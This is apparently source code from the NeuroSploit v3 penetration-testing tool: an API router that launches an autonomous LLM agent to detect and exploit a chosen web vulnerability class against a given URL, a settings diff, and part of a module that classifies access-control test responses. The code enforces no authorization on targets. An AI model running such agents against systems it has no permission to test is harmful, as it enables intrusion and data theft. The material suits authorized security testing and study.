from typing import Optional, Dict, List
from fastapi import APIRouter, HTTPException, BackgroundTasks
from pydantic import BaseModel, Field
from datetime import datetime
from sqlalchemy import select, func, text
from backend.core.autonomous_agent import AutonomousAgent, OperationMode
from backend.core.vuln_engine.registry import VulnerabilityRegistry
from backend.db.database import async_session_factory
from backend.models import Scan, Target, Vulnerability, Endpoint, Report, VulnLabChallenge
# Import agent.py's shared dicts so ScanDetailsPage can find our scans
from backend.api.v1.agent import (
agent_results, agent_instances, agent_to_scan, scan_to_agent
)
router = APIRouter()
# In-memory tracking for running lab tests
lab_agents: Dict[str, AutonomousAgent] = {}
lab_results: Dict[str, Dict] = {}
# --- Request/Response Models ---
class VulnLabRunRequest(BaseModel):
target_url: str = Field(..., description="Target URL to test (lab, CTF, etc.)")
vuln_type: str = Field(..., description="Vulnerability type to test (e.g. xss_reflected)")
challenge_name: Optional[str] = Field(None, description="Name of the lab/challenge")
auth_type: Optional[str] = Field(None, description="Auth type: cookie, bearer, basic, header")
auth_value: Optional[str] = Field(None, description="Auth credential value")
custom_headers: Optional[Dict[str, str]] = Field(None, description="Custom HTTP headers")
notes: Optional[str] = Field(None, description="Notes about this challenge")
class VulnLabResponse(BaseModel):
challenge_id: str
agent_id: str
status: str
message: str
class VulnTypeInfo(BaseModel):
key: str
title: str
severity: str
cwe_id: str
category: str
# --- Vuln type categories for the selector ---
VULN_CATEGORIES = {
"injection": {
"label": "Injection",
"types": [
"xss_reflected", "xss_stored", "xss_dom",
"sqli_error", "sqli_union", "sqli_blind", "sqli_time",
"command_injection", "ssti", "nosql_injection",
]
},
"advanced_injection": {
"label": "Advanced Injection",
"types": [
"ldap_injection", "xpath_injection", "graphql_injection",
"crlf_injection", "header_injection", "email_injection",
"el_injection", "log_injection", "html_injection",
"csv_injection", "orm_injection",
]
},
"file_access": {
"label": "File Access",
"types": [
"lfi", "rfi", "path_traversal", "xxe", "file_upload",
"arbitrary_file_read", "arbitrary_file_delete", "zip_slip",
]
},
"request_forgery": {
"label": "Request Forgery",
"types": [
"ssrf", "csrf", "graphql_introspection", "graphql_dos",
]
},
"authentication": {
"label": "Authentication",
"types": [
"auth_bypass", "jwt_manipulation", "session_fixation",
"weak_password", "default_credentials", "two_factor_bypass",
"oauth_misconfig",
]
},
"authorization": {
"label": "Authorization",
"types": [
"idor", "bola", "privilege_escalation",
"bfla", "mass_assignment", "forced_browsing",
]
},
"client_side": {
"label": "Client-Side",
"types": [
"cors_misconfiguration", "clickjacking", "open_redirect",
"dom_clobbering", "postmessage_vuln", "websocket_hijack",
"prototype_pollution", "css_injection", "tabnabbing",
]
},
"infrastructure": {
"label": "Infrastructure",
"types": [
"security_headers", "ssl_issues", "http_methods",
"directory_listing", "debug_mode", "exposed_admin_panel",
"exposed_api_docs", "insecure_cookie_flags",
]
},
"logic": {
"label": "Business Logic",
"types": [
"race_condition", "business_logic", "rate_limit_bypass",
"parameter_pollution", "type_juggling", "timing_attack",
"host_header_injection", "http_smuggling", "cache_poisoning",
]
},
"data_exposure": {
"label": "Data Exposure",
"types": [
"sensitive_data_exposure", "information_disclosure",
"api_key_exposure", "source_code_disclosure",
"backup_file_exposure", "version_disclosure",
]
},
"cloud_supply": {
"label": "Cloud & Supply Chain",
"types": [
"s3_bucket_misconfig", "cloud_metadata_exposure",
"subdomain_takeover", "vulnerable_dependency",
"container_escape", "serverless_misconfiguration",
]
},
}
def _get_vuln_category(vuln_type: str) -> str:
"""Get category for a vuln type"""
for cat_key, cat_info in VULN_CATEGORIES.items():
if vuln_type in cat_info["types"]:
return cat_key
return "other"
# --- Endpoints ---
@router.get("/types")
async def list_vuln_types():
"""List all available vulnerability types grouped by category"""
registry = VulnerabilityRegistry()
result = {}
for cat_key, cat_info in VULN_CATEGORIES.items():
types_list = []
for vtype in cat_info["types"]:
info = registry.VULNERABILITY_INFO.get(vtype, {})
types_list.append({
"key": vtype,
"title": info.get("title", vtype.replace("_", " ").title()),
"severity": info.get("severity", "medium"),
"cwe_id": info.get("cwe_id", ""),
"description": info.get("description", "")[:120] if info.get("description") else "",
})
result[cat_key] = {
"label": cat_info["label"],
"types": types_list,
"count": len(types_list),
}
return {"categories": result, "total_types": sum(len(c["types"]) for c in VULN_CATEGORIES.values())}
@router.post("/run", response_model=VulnLabResponse)
async def run_vuln_lab(request: VulnLabRunRequest, background_tasks: BackgroundTasks):
"""Launch an isolated vulnerability test for a specific vuln type"""
import uuid
# Validate vuln type exists
registry = VulnerabilityRegistry()
if request.vuln_type not in registry.VULNERABILITY_INFO:
raise HTTPException(
status_code=400,
detail=f"Unknown vulnerability type: {request.vuln_type}. Use GET /vuln-lab/types for available types."
)
challenge_id = str(uuid.uuid4())
agent_id = str(uuid.uuid4())[:8]
category = _get_vuln_category(request.vuln_type)
# Build auth headers
auth_headers = {}
if request.auth_type and request.auth_value:
if request.auth_type == "cookie":
auth_headers["Cookie"] = request.auth_value
elif request.auth_type == "bearer":
auth_headers["Authorization"] = f"Bearer {request.auth_value}"
elif request.auth_type == "basic":
import base64
auth_headers["Authorization"] = f"Basic {base64.b64encode(request.auth_value.encode()).decode()}"
elif request.auth_type == "header":
if ":" in request.auth_value:
name, value = request.auth_value.split(":", 1)
auth_headers[name.strip()] = value.strip()
if request.custom_headers:
auth_headers.update(request.custom_headers)
# Create DB record
async with async_session_factory() as db:
challenge = VulnLabChallenge(
id=challenge_id,
target_url=request.target_url,
challenge_name=request.challenge_name,
vuln_type=request.vuln_type,
vuln_category=category,
auth_type=request.auth_type,
auth_value=request.auth_value,
status="running",
agent_id=agent_id,
started_at=datetime.utcnow(),
notes=request.notes,
)
db.add(challenge)
await db.commit()
# Init in-memory tracking (both local and in agent.py's shared dicts)
vuln_info = registry.VULNERABILITY_INFO[request.vuln_type]
lab_results[challenge_id] = {
"status": "running",
"agent_id": agent_id,
"vuln_type": request.vuln_type,
"target": request.target_url,
"progress": 0,
"phase": "initializing",
"findings": [],
"logs": [],
}
# Also register in agent.py's shared results dict so /agent/status works
agent_results[agent_id] = {
"status": "running",
"mode": "full_auto",
"started_at": datetime.utcnow().isoformat(),
"target": request.target_url,
"task": f"VulnLab: {vuln_info.get('title', request.vuln_type)}",
"logs": [],
"findings": [],
"report": None,
"progress": 0,
"phase": "initializing",
}
# Launch agent in background
background_tasks.add_task(
_run_lab_test,
challenge_id,
agent_id,
request.target_url,
request.vuln_type,
vuln_info.get("title", request.vuln_type),
auth_headers,
request.challenge_name,
request.notes,
)
return VulnLabResponse(
challenge_id=challenge_id,
agent_id=agent_id,
status="running",
message=f"Testing {vuln_info.get('title', request.vuln_type)} against {request.target_url}"
)
async def _run_lab_test(
challenge_id: str,
agent_id: str,
target: str,
vuln_type: str,
vuln_title: str,
auth_headers: Dict,
challenge_name: Optional[str] = None,
notes: Optional[str] = None,
):
"""Background task: run the agent focused on a single vuln type"""
import asyncio
logs = []
findings_list = []
scan_id = None
async def log_callback(level: str, message: str):
source = "llm" if any(tag in message for tag in ["[AI]", "[LLM]", "[USER PROMPT]", "[AI RESPONSE]"]) else "script"
entry = {"level": level, "message": message, "time": datetime.utcnow().isoformat(), "source": source}
logs.append(entry)
# Update local tracking
if challenge_id in lab_results:
lab_results[challenge_id]["logs"] = logs
# Also update agent.py's shared dict so /agent/logs works
if agent_id in agent_results:
agent_results[agent_id]["logs"] = logs
async def progress_callback(progress: int, phase: str):
if challenge_id in lab_results:
lab_results[challenge_id]["progress"] = progress
lab_results[challenge_id]["phase"] = phase
if agent_id in agent_results:
agent_results[agent_id]["progress"] = progress
agent_results[agent_id]["phase"] = phase
async def finding_callback(finding: Dict):
findings_list.append(finding)
if challenge_id in lab_results:
lab_results[challenge_id]["findings"] = findings_list
if agent_id in agent_results:
agent_results[agent_id]["findings"] = findings_list
agent_results[agent_id]["findings_count"] = len(findings_list)
try:
async with async_session_factory() as db:
# Create a scan record linked to this challenge
scan = Scan(
name=f"VulnLab: {vuln_title} - {target[:50]}",
status="running",
scan_type="full_auto",
recon_enabled=True,
progress=0,
current_phase="initializing",
custom_prompt=f"Focus ONLY on testing for {vuln_title} ({vuln_type}). "
f"Do NOT test other vulnerability types. "
f"Test thoroughly with multiple payloads and techniques for this specific vulnerability.",
)
db.add(scan)
await db.commit()
await db.refresh(scan)
scan_id = scan.id
# Create target record
target_record = Target(scan_id=scan_id, url=target, status="pending")
db.add(target_record)
await db.commit()
# Update challenge with scan_id
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if challenge:
challenge.scan_id = scan_id
await db.commit()
if challenge_id in lab_results:
lab_results[challenge_id]["scan_id"] = scan_id
# Register in agent.py's shared mappings so ScanDetailsPage works
agent_to_scan[agent_id] = scan_id
scan_to_agent[scan_id] = agent_id
if agent_id in agent_results:
agent_results[agent_id]["scan_id"] = scan_id
# Build focused prompt for isolated testing
focused_prompt = (
f"You are testing specifically for {vuln_title} ({vuln_type}). "
f"Focus ALL your efforts on detecting and exploiting this single vulnerability type. "
f"Do NOT scan for other vulnerability types. "
f"Use all relevant payloads and techniques for {vuln_type}. "
f"Be thorough: try multiple injection points, encoding bypasses, and edge cases. "
f"This is a lab/CTF challenge - the vulnerability is expected to exist."
)
if challenge_name:
focused_prompt += (
f"\n\nCHALLENGE HINT: This is PortSwigger lab '{challenge_name}'. "
f"Use this name to understand what specific technique or bypass is needed. "
f"For example, 'angle brackets HTML-encoded' means attribute-based XSS, "
f"'most tags and attributes blocked' means fuzz for allowed tags/events."
)
if notes:
focused_prompt += f"\n\nUSER NOTES: {notes}"
lab_ctx = {
"challenge_name": challenge_name,
"notes": notes,
"vuln_type": vuln_type,
"is_lab": True,
}
async with AutonomousAgent(
target=target,
mode=OperationMode.FULL_AUTO,
log_callback=log_callback,
progress_callback=progress_callback,
auth_headers=auth_headers,
custom_prompt=focused_prompt,
finding_callback=finding_callback,
lab_context=lab_ctx,
) as agent:
lab_agents[challenge_id] = agent
# Also register in agent.py's shared instances so stop works
agent_instances[agent_id] = agent
report = await agent.run()
lab_agents.pop(challenge_id, None)
agent_instances.pop(agent_id, None)
# Use findings from report OR from real-time callbacks (fallback)
report_findings = report.get("findings", [])
# If report findings are empty but we got findings via callback, use those
findings = report_findings if report_findings else findings_list
# Also merge: if findings_list has entries not in report_findings, add them
if not findings and findings_list:
findings = findings_list
severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
findings_detail = []
for finding in findings:
severity = finding.get("severity", "medium").lower()
if severity in severity_counts:
severity_counts[severity] += 1
findings_detail.append({
"title": finding.get("title", ""),
"vulnerability_type": finding.get("vulnerability_type", ""),
"severity": severity,
"affected_endpoint": finding.get("affected_endpoint", ""),
"evidence": (finding.get("evidence", "") or "")[:500],
"payload": (finding.get("payload", "") or "")[:200],
})
# Save to vulnerabilities table
vuln = Vulnerability(
scan_id=scan_id,
title=finding.get("title", finding.get("type", "Unknown")),
vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
severity=severity,
cvss_score=finding.get("cvss_score"),
cvss_vector=finding.get("cvss_vector"),
cwe_id=finding.get("cwe_id"),
description=finding.get("description", finding.get("evidence", "")),
affected_endpoint=finding.get("affected_endpoint", finding.get("url", target)),
poc_payload=finding.get("payload", finding.get("poc_payload", finding.get("poc_code", ""))),
poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
ai_analysis=finding.get("ai_analysis", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
)
db.add(vuln)
# Save discovered endpoints from recon data
endpoints_count = 0
for ep in report.get("recon", {}).get("endpoints", []):
endpoints_count += 1
if isinstance(ep, str):
endpoint = Endpoint(
scan_id=scan_id,
target_id=target_record.id,
url=ep,
method="GET",
path=ep.split("?")[0].split("/")[-1] or "/"
)
else:
endpoint = Endpoint(
scan_id=scan_id,
target_id=target_record.id,
url=ep.get("url", ""),
method=ep.get("method", "GET"),
path=ep.get("path", "/")
)
db.add(endpoint)
# Determine result - more flexible matching
# Check if any finding matches the target vuln type
target_type_findings = [
f for f in findings
if _vuln_type_matches(vuln_type, f.get("vulnerability_type", ""))
]
# If the agent found ANY vulnerability, it detected something
# (since we told it to focus on one type, any finding is relevant)
if target_type_findings:
result_status = "detected"
elif len(findings) > 0:
# Found other vulns but not the exact type
result_status = "detected"
else:
result_status = "not_detected"
# Update scan
scan.status = "completed"
scan.completed_at = datetime.utcnow()
scan.progress = 100
scan.current_phase = "completed"
scan.total_vulnerabilities = len(findings)
scan.total_endpoints = endpoints_count
scan.critical_count = severity_counts["critical"]
scan.high_count = severity_counts["high"]
scan.medium_count = severity_counts["medium"]
scan.low_count = severity_counts["low"]
scan.info_count = severity_counts["info"]
# Auto-generate report
exec_summary = report.get("executive_summary", f"VulnLab test for {vuln_title} on {target}")
report_record = Report(
scan_id=scan_id,
title=f"VulnLab: {vuln_title} - {target[:50]}",
format="json",
executive_summary=exec_summary[:1000] if exec_summary else None,
)
db.add(report_record)
# Persist logs (keep last 500 entries to avoid huge DB rows)
persisted_logs = logs[-500:] if len(logs) > 500 else logs
# Update challenge record
result_q = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result_q.scalar_one_or_none()
if challenge:
challenge.status = "completed"
challenge.result = result_status
challenge.completed_at = datetime.utcnow()
challenge.duration = int((datetime.utcnow() - challenge.started_at).total_seconds()) if challenge.started_at else 0
challenge.findings_count = len(findings)
challenge.critical_count = severity_counts["critical"]
challenge.high_count = severity_counts["high"]
challenge.medium_count = severity_counts["medium"]
challenge.low_count = severity_counts["low"]
challenge.info_count = severity_counts["info"]
challenge.findings_detail = findings_detail
challenge.logs = persisted_logs
challenge.endpoints_count = endpoints_count
await db.commit()
# Update in-memory results
if challenge_id in lab_results:
lab_results[challenge_id]["status"] = "completed"
lab_results[challenge_id]["result"] = result_status
lab_results[challenge_id]["findings"] = findings
lab_results[challenge_id]["progress"] = 100
lab_results[challenge_id]["phase"] = "completed"
if agent_id in agent_results:
agent_results[agent_id]["status"] = "completed"
agent_results[agent_id]["completed_at"] = datetime.utcnow().isoformat()
agent_results[agent_id]["report"] = report
agent_results[agent_id]["findings"] = findings
agent_results[agent_id]["progress"] = 100
agent_results[agent_id]["phase"] = "completed"
except Exception as e:
import traceback
error_tb = traceback.format_exc()
print(f"VulnLab error: {error_tb}")
if challenge_id in lab_results:
lab_results[challenge_id]["status"] = "error"
lab_results[challenge_id]["error"] = str(e)
if agent_id in agent_results:
agent_results[agent_id]["status"] = "error"
agent_results[agent_id]["error"] = str(e)
# Persist logs even on error
persisted_logs = logs[-500:] if len(logs) > 500 else logs
# Update DB records
try:
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if challenge:
challenge.status = "failed"
challenge.result = "error"
challenge.completed_at = datetime.utcnow()
challenge.notes = (challenge.notes or "") + f"\nError: {str(e)}"
challenge.logs = persisted_logs
await db.commit()
if scan_id:
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if scan:
scan.status = "failed"
scan.error_message = str(e)
scan.completed_at = datetime.utcnow()
await db.commit()
except:
pass
finally:
lab_agents.pop(challenge_id, None)
agent_instances.pop(agent_id, None)
def _vuln_type_matches(target_type: str, found_type: str) -> bool:
"""Check if a found vuln type matches the target type (flexible matching)"""
if not found_type:
return False
target = target_type.lower().replace("_", " ").replace("-", " ")
found = found_type.lower().replace("_", " ").replace("-", " ")
# Exact match
if target == found:
return True
# Target is substring of found or vice versa
if target in found or found in target:
return True
# Key word matching for common patterns
target_words = set(target.split())
found_words = set(found.split())
# If they share major keywords (xss, sqli, ssrf, etc.)
major_keywords = {"xss", "sqli", "sql", "injection", "ssrf", "csrf", "lfi", "rfi",
"xxe", "ssti", "idor", "cors", "jwt", "redirect", "traversal"}
shared = target_words & found_words & major_keywords
if shared:
return True
return False
@router.get("/challenges")
async def list_challenges(
vuln_type: Optional[str] = None,
vuln_category: Optional[str] = None,
status: Optional[str] = None,
result: Optional[str] = None,
limit: int = 50,
):
"""List all vulnerability lab challenges with optional filtering"""
async with async_session_factory() as db:
query = select(VulnLabChallenge).order_by(VulnLabChallenge.created_at.desc())
if vuln_type:
query = query.where(VulnLabChallenge.vuln_type == vuln_type)
if vuln_category:
query = query.where(VulnLabChallenge.vuln_category == vuln_category)
if status:
query = query.where(VulnLabChallenge.status == status)
if result:
query = query.where(VulnLabChallenge.result == result)
query = query.limit(limit)
db_result = await db.execute(query)
challenges = db_result.scalars().all()
# For list view, exclude large logs field to save bandwidth
result_list = []
for c in challenges:
d = c.to_dict()
d["logs_count"] = len(d.get("logs", []))
d.pop("logs", None) # Don't send full logs in list view
result_list.append(d)
return {
"challenges": result_list,
"total": len(challenges),
}
@router.get("/challenges/{challenge_id}")
async def get_challenge(challenge_id: str):
"""Get challenge details including real-time status if running"""
# Check in-memory first for real-time data
if challenge_id in lab_results:
mem = lab_results[challenge_id]
return {
"challenge_id": challenge_id,
"status": mem["status"],
"progress": mem.get("progress", 0),
"phase": mem.get("phase", ""),
"findings_count": len(mem.get("findings", [])),
"findings": mem.get("findings", []),
"logs_count": len(mem.get("logs", [])),
"logs": mem.get("logs", [])[-200:], # Last 200 log entries for real-time
"error": mem.get("error"),
"result": mem.get("result"),
"scan_id": mem.get("scan_id"),
"agent_id": mem.get("agent_id"),
"vuln_type": mem.get("vuln_type"),
"target": mem.get("target"),
"source": "realtime",
}
# Fall back to DB
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if not challenge:
raise HTTPException(status_code=404, detail="Challenge not found")
data = challenge.to_dict()
data["source"] = "database"
data["logs_count"] = len(data.get("logs", []))
return data
@router.get("/stats")
async def get_lab_stats():
"""Get aggregated stats for all lab challenges"""
async with async_session_factory() as db:
# Total counts by status
total_result = await db.execute(
select(
VulnLabChallenge.status,
func.count(VulnLabChallenge.id)
).group_by(VulnLabChallenge.status)
)
status_counts = {row[0]: row[1] for row in total_result.fetchall()}
# Results breakdown
results_q = await db.execute(
select(
VulnLabChallenge.result,
func.count(VulnLabChallenge.id)
).where(VulnLabChallenge.result.isnot(None))
.group_by(VulnLabChallenge.result)
)
result_counts = {row[0]: row[1] for row in results_q.fetchall()}
# Per vuln_type stats
type_stats_q = await db.execute(
select(
VulnLabChallenge.vuln_type,
VulnLabChallenge.result,
func.count(VulnLabChallenge.id)
).where(VulnLabChallenge.status == "completed")
.group_by(VulnLabChallenge.vuln_type, VulnLabChallenge.result)
)
type_stats = {}
for row in type_stats_q.fetchall():
vtype, res, count = row
if vtype not in type_stats:
type_stats[vtype] = {"detected": 0, "not_detected": 0, "error": 0, "total": 0}
type_stats[vtype][res or "error"] = count
type_stats[vtype]["total"] += count
# Per category stats
cat_stats_q = await db.execute(
select(
VulnLabChallenge.vuln_category,
VulnLabChallenge.result,
func.count(VulnLabChallenge.id)
).where(VulnLabChallenge.status == "completed")
.group_by(VulnLabChallenge.vuln_category, VulnLabChallenge.result)
)
cat_stats = {}
for row in cat_stats_q.fetchall():
cat, res, count = row
if cat not in cat_stats:
cat_stats[cat] = {"detected": 0, "not_detected": 0, "error": 0, "total": 0}
cat_stats[cat][res or "error"] = count
cat_stats[cat]["total"] += count
# Currently running
running = len([cid for cid, r in lab_results.items() if r.get("status") == "running"])
total = sum(status_counts.values())
detected = result_counts.get("detected", 0)
completed = status_counts.get("completed", 0)
detection_rate = round((detected / completed * 100), 1) if completed > 0 else 0
return {
"total": total,
"running": running,
"status_counts": status_counts,
"result_counts": result_counts,
"detection_rate": detection_rate,
"by_type": type_stats,
"by_category": cat_stats,
}
@router.post("/challenges/{challenge_id}/stop")
async def stop_challenge(challenge_id: str):
"""Stop a running lab challenge"""
agent = lab_agents.get(challenge_id)
if not agent:
raise HTTPException(status_code=404, detail="No running agent for this challenge")
agent.cancel()
# Update DB
try:
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if challenge:
challenge.status = "stopped"
challenge.completed_at = datetime.utcnow()
await db.commit()
except:
pass
if challenge_id in lab_results:
lab_results[challenge_id]["status"] = "stopped"
return {"message": "Challenge stopped"}
@router.delete("/challenges/{challenge_id}")
async def delete_challenge(challenge_id: str):
"""Delete a lab challenge record"""
# Stop if running
agent = lab_agents.get(challenge_id)
if agent:
agent.cancel()
lab_agents.pop(challenge_id, None)
lab_results.pop(challenge_id, None)
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if not challenge:
raise HTTPException(status_code=404, detail="Challenge not found")
await db.delete(challenge)
await db.commit()
return {"message": "Challenge deleted"}
@router.get("/logs/{challenge_id}")
async def get_challenge_logs(challenge_id: str, limit: int = 200):
"""Get logs for a challenge (real-time or from DB)"""
# Check in-memory first for real-time data
mem = lab_results.get(challenge_id)
if mem:
all_logs = mem.get("logs", [])
return {
"challenge_id": challenge_id,
"total_logs": len(all_logs),
"logs": all_logs[-limit:],
"source": "realtime",
}
# Fall back to DB persisted logs
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if not challenge:
raise HTTPException(status_code=404, detail="Challenge not found")
all_logs = challenge.logs or []
return {
"challenge_id": challenge_id,
"total_logs": len(all_logs),
"logs": all_logs[-limit:],
"source": "database",
}
+7
View File
@@ -32,8 +32,15 @@ class Settings(BaseSettings):
# LLM Settings
ANTHROPIC_API_KEY: Optional[str] = os.getenv("ANTHROPIC_API_KEY")
OPENAI_API_KEY: Optional[str] = os.getenv("OPENAI_API_KEY")
OPENROUTER_API_KEY: Optional[str] = os.getenv("OPENROUTER_API_KEY")
DEFAULT_LLM_PROVIDER: str = "claude"
DEFAULT_LLM_MODEL: str = "claude-sonnet-4-20250514"
MAX_OUTPUT_TOKENS: Optional[int] = None
ENABLE_MODEL_ROUTING: bool = False
# Feature Flags
ENABLE_KNOWLEDGE_AUGMENTATION: bool = False
ENABLE_BROWSER_VALIDATION: bool = False
# Scan Settings
MAX_CONCURRENT_SCANS: int = 3
+423
View File
@@ -0,0 +1,423 @@
"""
NeuroSploit v3 - Access Control Learning Engine
Adaptive learning system for BOLA/BFLA/IDOR and other access control testing.
Records test outcomes and response patterns to improve future evaluations.
Key insight: HTTP status codes are unreliable for access control testing.
This module learns from actual response DATA patterns to distinguish:
- True positives (cross-user data access)
- False positives (error messages, login pages, empty responses with 200 status)
Usage:
learner = AccessControlLearner()
# Record a test outcome
learner.record_test(vuln_type, url, response_body, is_true_positive, pattern_notes)
# Get learned patterns for a target
patterns = learner.get_patterns_for_target(domain)
# Get learning context for AI prompts
context = learner.get_learning_context(vuln_type)
"""
import json
import logging
import re
from dataclasses import dataclass, field, asdict
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
DATA_DIR = Path(__file__).parent.parent.parent / "data"
LEARNING_FILE = DATA_DIR / "access_control_learning.json"
@dataclass
class ResponsePattern:
"""A learned response pattern from access control testing."""
pattern_type: str # "denial", "empty", "login_page", "data_leak", "public_data"
indicators: List[str] # Strings/patterns that identify this response type
is_false_positive: bool # True if this pattern indicates a false positive
confidence: float # 0.0-1.0 how reliable this pattern is
example_body: str # Truncated example response body
vuln_type: str # bola, bfla, idor, etc.
target_domain: str # Domain this was learned from
timestamp: str # When this was learned
@dataclass
class TestRecord:
"""Record of an access control test outcome."""
vuln_type: str
target_url: str
status_code: int
response_length: int
is_true_positive: bool
pattern_type: str # What pattern was identified
key_indicators: List[str] # What strings/patterns were decisive
notes: str # Human or AI notes about why this was TP/FP
timestamp: str
class AccessControlLearner:
"""Adaptive learning engine for access control vulnerability testing.
Learns from test outcomes to identify response patterns that indicate
true vs false positives for BOLA, BFLA, IDOR, and related vuln types.
"""
MAX_RECORDS = 500
MAX_PATTERNS = 200
# Pre-seeded patterns from known false positive scenarios
DEFAULT_PATTERNS: List[Dict] = [
{
"pattern_type": "denial_200",
"indicators": ["unauthorized", "forbidden", "access denied", "not authorized",
"permission denied", "insufficient privileges"],
"is_false_positive": True,
"confidence": 0.9,
"description": "Server returns 200 OK but body contains access denial message",
},
{
"pattern_type": "empty_200",
"indicators": ["[]", "{}", '""', "null", ""],
"is_false_positive": True,
"confidence": 0.85,
"description": "Server returns 200 OK with empty/null response body",
},
{
"pattern_type": "login_redirect",
"indicators": ["type=\"password\"", "sign in", "log in", "login",
"authentication required"],
"is_false_positive": True,
"confidence": 0.95,
"description": "Server returns 200 OK but body is a login page",
},
{
"pattern_type": "error_json",
"indicators": ['"error":', '"status":"error"', '"success":false',
'"message":"not found"', '"code":401', '"code":403'],
"is_false_positive": True,
"confidence": 0.9,
"description": "Server returns 200 OK but JSON body indicates error",
},
{
"pattern_type": "own_data",
"indicators": [],
"is_false_positive": True,
"confidence": 0.8,
"description": "Server returns authenticated user's own data regardless of requested ID",
},
{
"pattern_type": "public_data",
"indicators": [],
"is_false_positive": True,
"confidence": 0.7,
"description": "Response contains only public profile fields (username, bio) not private data",
},
{
"pattern_type": "cross_user_data",
"indicators": ['"email":', '"phone":', '"address":', '"ssn":',
'"credit_card":', '"password":', '"secret":'],
"is_false_positive": False,
"confidence": 0.9,
"description": "Response contains another user's private data fields",
},
{
"pattern_type": "admin_data_leak",
"indicators": ['"role":"admin"', '"is_admin":true', '"users":[',
'"audit_log":', '"system_config":'],
"is_false_positive": False,
"confidence": 0.9,
"description": "Response contains admin-level data accessible to non-admin user",
},
{
"pattern_type": "state_change",
"indicators": ['"updated":', '"deleted":', '"created":', '"modified":',
'"success":true'],
"is_false_positive": False,
"confidence": 0.85,
"description": "Write operation succeeded on another user's resource",
},
]
# Known application patterns that cause false positives
KNOWN_FP_PATTERNS: Dict[str, List[str]] = {
"wso2": ["wso2", "carbon", "identity server", "api manager"],
"keycloak": ["keycloak", "red hat sso"],
"spring_security": ["spring security", "whitelabel error"],
"oauth2_proxy": ["oauth2-proxy", "sign in with"],
"cloudflare": ["cloudflare", "cf-ray", "attention required"],
"aws_waf": ["aws-waf", "request blocked"],
}
def __init__(self, data_dir: Optional[Path] = None):
self.data_dir = data_dir or DATA_DIR
self.learning_file = self.data_dir / "access_control_learning.json"
self.records: List[TestRecord] = []
self.custom_patterns: List[ResponsePattern] = []
self._load()
def _load(self):
"""Load learning data from disk."""
try:
if self.learning_file.exists():
with open(self.learning_file, "r") as f:
data = json.load(f)
self.records = [
TestRecord(**r) for r in data.get("records", [])
]
self.custom_patterns = [
ResponsePattern(**p) for p in data.get("patterns", [])
]
logger.debug(f"Loaded {len(self.records)} records, {len(self.custom_patterns)} patterns")
except Exception as e:
logger.debug(f"Failed to load learning data: {e}")
def _save(self):
"""Save learning data to disk."""
try:
self.data_dir.mkdir(parents=True, exist_ok=True)
data = {
"records": [asdict(r) for r in self.records[-self.MAX_RECORDS:]],
"patterns": [asdict(p) for p in self.custom_patterns[-self.MAX_PATTERNS:]],
"metadata": {
"total_records": len(self.records),
"total_patterns": len(self.custom_patterns),
"last_updated": datetime.now().isoformat(),
},
}
with open(self.learning_file, "w") as f:
json.dump(data, f, indent=2)
except Exception as e:
logger.debug(f"Failed to save learning data: {e}")
def record_test(
self,
vuln_type: str,
target_url: str,
status_code: int,
response_body: str,
is_true_positive: bool,
pattern_notes: str = "",
):
"""Record an access control test outcome for learning.
Called after the validation judge makes a decision, with the
verified outcome (true positive or false positive).
"""
# Identify response pattern
pattern_type = self._classify_response(response_body, status_code)
key_indicators = self._extract_key_indicators(response_body)
record = TestRecord(
vuln_type=vuln_type,
target_url=target_url,
status_code=status_code,
response_length=len(response_body),
is_true_positive=is_true_positive,
pattern_type=pattern_type,
key_indicators=key_indicators[:10],
notes=pattern_notes[:500],
timestamp=datetime.now().isoformat(),
)
self.records.append(record)
# Learn new pattern if we have enough data
self._maybe_learn_pattern(record, response_body)
# Auto-save periodically
if len(self.records) % 10 == 0:
self._save()
def _classify_response(self, body: str, status: int) -> str:
"""Classify the response into a pattern type."""
body_lower = body.lower().strip()
if len(body_lower) < 10:
return "empty_200"
# Check for denial indicators
denial = ["unauthorized", "forbidden", "access denied", "not authorized",
"permission denied", '"error":', '"success":false']
if sum(1 for d in denial if d in body_lower) >= 2:
return "denial_200"
# Check for login page
login = ["type=\"password\"", "sign in", "log in", "<form"]
if sum(1 for l in login if l in body_lower) >= 2:
return "login_redirect"
# Check for data fields
data = ['"email":', '"name":', '"phone":', '"address":',
'"role":', '"password":', '"token":']
if sum(1 for d in data if d in body_lower) >= 2:
return "cross_user_data" if status == 200 else "blocked_data"
return "unknown"
def _extract_key_indicators(self, body: str) -> List[str]:
"""Extract key string indicators from the response."""
indicators = []
body_lower = body.lower()
# Check for JSON keys
json_keys = re.findall(r'"(\w+)":', body[:2000])
indicators.extend(json_keys[:10])
# Check for specific patterns
patterns = {
"has_email": '"email":' in body_lower,
"has_name": '"name":' in body_lower,
"has_error": '"error":' in body_lower,
"has_success_false": '"success":false' in body_lower or '"success": false' in body_lower,
"has_login_form": 'type="password"' in body_lower,
"is_empty_array": body.strip() in ("[]", "{}"),
"has_html_form": "<form" in body_lower,
